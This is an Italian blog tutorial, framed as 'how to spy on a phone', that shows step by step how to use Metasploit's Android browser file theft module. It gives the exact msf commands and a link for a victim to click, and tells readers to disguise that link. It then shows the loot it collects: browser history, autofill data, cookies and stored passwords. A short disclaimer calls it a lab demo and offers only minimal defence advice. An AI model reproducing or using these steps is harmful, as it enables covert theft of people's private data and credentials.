fbpx
History browser android

File Theft con Metasploit – Come Spiare un Cellulare




In questa demo tratteremo un attacco molto pericoloso contro i Browser Android. La tecnica consiste nel far cliccare un link alla vittima contenente del codice java al fine di rubare l’intera cronologia del dispositivo da remoto. L’attacco in questione è denominato “Android Browser File Theft”.

Prerequisiti

  • Metasploit preinstallato
  • Armitage Preinstallato (Versione grafica di Metasploit) facoltativo
  • Apache web server preinstallato
  • Kali Linux

Iniziamo…

Dato che nel nostro test attaccheremo un cellulare Android con connessione mobile, dobbiamo abbilitare le porte del nostro Router per interfacciarci con l’esterno. Nel nostro caso come da foto in basso.

porte routerClicca per ingrandire

dopodichè aprire un terminale e attivare il WebServer Apache

service apache2 start

ora per semplificarci la vita utilizzeremo Armitage (versione grafica di Metasploit)

digitare nella barra di ricerca laterale “Android Browser File Theft”

fare doppio click sul Payload ed avviarlo (vedi foto)

Clicca per ingrandire

L’output sarà il seguente (come in foto sopra):

msf > use auxiliary/gather/android_browser_file_theft
msf auxiliary(android_browser_file_theft) > set DEFAULT_FILES 1
DEFAULT_FILES => 1
msf auxiliary(android_browser_file_theft) > set SRVPORT 8080
SRVPORT => 8080
msf auxiliary(android_browser_file_theft) > set SSL 0
SSL => 0
msf auxiliary(android_browser_file_theft) > set SRVHOST https://79.56.147.37
SRVHOST => 0.0.0.0
msf auxiliary(android_browser_file_theft) > run -j
[*] Auxiliary module running as background job
[*] Using URL: http://0.0.0.0:8080/6nBqD7lZmyfYcxz
[*] Local IP: 192.168.178.24:8080/6nBqD7lZmyfYcxz
[*] Server started.




il link da inviare alla vittima è quello in grassetto (cambiate il vostro IP privato con quello pubblico es.http://79.56.147.37/. L’IP pubblico potrete reperirlo QUI: https://www.whatismyip.com/it/ ).

Ricordate di mimetizzare il link, esistono diversi modi per farlo, ma non ne parleremo in questo articolo.

Fate in modo che il vostro soggetto clicchi il link mediante il suo dispositivo Android (altrimenti è tutto inutile)

restate in attesa….

…una volta cliccato ecco l’output

[*] 5.90.170.248 android_browser_file_theft - Sending exploit landing page...
[+] 5.90.170.248 android_browser_file_theft - File received: 16.38kb autofill.db
[+] 5.90.170.248 android_browser_file_theft - Saved to: /root/.msf5/loot/20160805144402_default_5.90.170.248_autofill.db_486422.db
[+] 5.90.170.248 android_browser_file_theft - File received: 40.96kb webview.db
[+] 5.90.170.248 android_browser_file_theft - Saved to: /root/.msf5/loot/20160805144403_default_5.90.170.248_webview.db_578294.db
[+] 5.90.170.248 android_browser_file_theft - File received: 91.14kb webviewCookiesChromium.db
[+] 5.90.170.248 android_browser_file_theft - Saved to: /root/.msf5/loot/20160805144404_default_5.90.170.248_webviewCookiesCh_035418.db
[+] 5.90.170.248 android_browser_file_theft - File received: 6.14kb Databases.db
[+] 5.90.170.248 android_browser_file_theft - Saved to: /root/.msf5/loot/20160805144422_default_5.90.170.248_Databases.db_711988.db
[+] 5.90.170.248 android_browser_file_theft - File received: 22.53kb ApplicationCache.db
[+] 5.90.170.248 android_browser_file_theft - Saved to: /root/.msf5/loot/20160805144422_default_5.90.170.248_ApplicationCache_368957.db
[+] 5.90.170.248 android_browser_file_theft - File received: 7.17kb webviewCookiesChromiumPrivate.db
[+] 5.90.170.248 android_browser_file_theft - Saved to: /root/.msf5/loot/20160805144422_default_5.90.170.248_webviewCookiesCh_563404.db
[+] 5.90.170.248 android_browser_file_theft - File received: 2523.14kb browser2.db
[+] 5.90.170.248 android_browser_file_theft - Saved to: /root/.msf5/loot/20160805144458_default_5.90.170.248_browser2.db_640798.db

Schermata da Screencast_05-08-2016_14:54:51.webm - 2Clicca per ingrandire

i file verranno salvati nella seguente directory: cd /root/.msf5/loot/ (vedi foto in basso)

Schermata da Screencast_05-08-2016_15:04:00.webmClicca per ingrandire

i file sono in formato .db e potranno essere aperti (nel nostro caso) con il tool SQLite (preinstallato su Kali Linux 2.0)

Dalla sequenza di foto in basso potrete osservare un parziale del risultato  (clicca le foto per ingrandire)

history1 history2 preferiti1 preferiti2 ricerche1 ricerche2

come si evincie dalle foto di cui sopra è stata recuperata l’intera history del browser attaccato, compresi i cookie, gli account e le password memorizzate (che non abbiamo mostrato nelle foto). Nelle foto che mostriamo si vedono, le ricerche effettuate, i link cliccati, quante volte e quando sono stati visitati i siti, i preferiti salvati (bookmarks), le ricerche su Google, etc…

Non occorrono molte spiegazione per capire la potenze e la pericolosità di questo attacco. La vittima cliccando il link, in un instante ci ha fornito gran parte della sua vita privata! Abbiamo omesso, come già detto, di mostrare password, account e cookie… ma disponendo di tali dati… immaginate un pò!

Come difendersi?

  • Non cliccare link sospetti
  • Cancellare sempre la cronologia



N.B.

Il telefono utilizzato, gli indirizzi IP e le informazioni “sensibili” mostrate in foto, fanno tutte parte di un ambiente di test preparato Ad Hoc per la nostra demo, nessun reato è stato commesso.

Ci teniamo a ricordarvi, come sempre, che l’utilizzo improprio di tali tecniche e strumenti sono reato penale! La demo è a puro scopo istruttivo.

se avete domande, contattatemi QUI 😉

Grazie per la lettura!

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

2 commenti su “File Theft con Metasploit – Come Spiare un Cellulare”